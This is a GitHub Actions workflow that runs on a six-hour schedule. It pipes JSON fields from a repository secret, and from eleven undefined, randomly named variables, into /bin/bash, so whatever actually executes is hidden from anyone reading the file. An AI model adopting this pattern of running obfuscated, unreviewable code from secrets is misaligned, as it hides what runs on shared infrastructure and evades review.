name: quansuanshashou

on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: quansuanshashou
        env:
          g917: ${{ secrets.g917 }}
        run: |
          echo $g917 | jq -r .q69452 | /bin/bash
          echo $txdbt8 | jq -r .j7900 | /bin/bash
          echo $va9 | jq -r .qbk2179 | /bin/bash
          echo $mma2779 | jq -r .uwx120 | /bin/bash
          echo $mpex1 | jq -r .xe1 | /bin/bash
          echo $mvyf19 | jq -r .rud1 | /bin/bash
          echo $tliki98510 | jq -r .trmzy24 | /bin/bash
          echo $lov9598 | jq -r .fy2663 | /bin/bash
          echo $q5734 | jq -r .w353 | /bin/bash
          echo $vayxg124 | jq -r .fu0 | /bin/bash
          echo $cmby5212 | jq -r .vz9 | /bin/bash
          echo $zkhea14902 | jq -r .szca9395 | /bin/bash

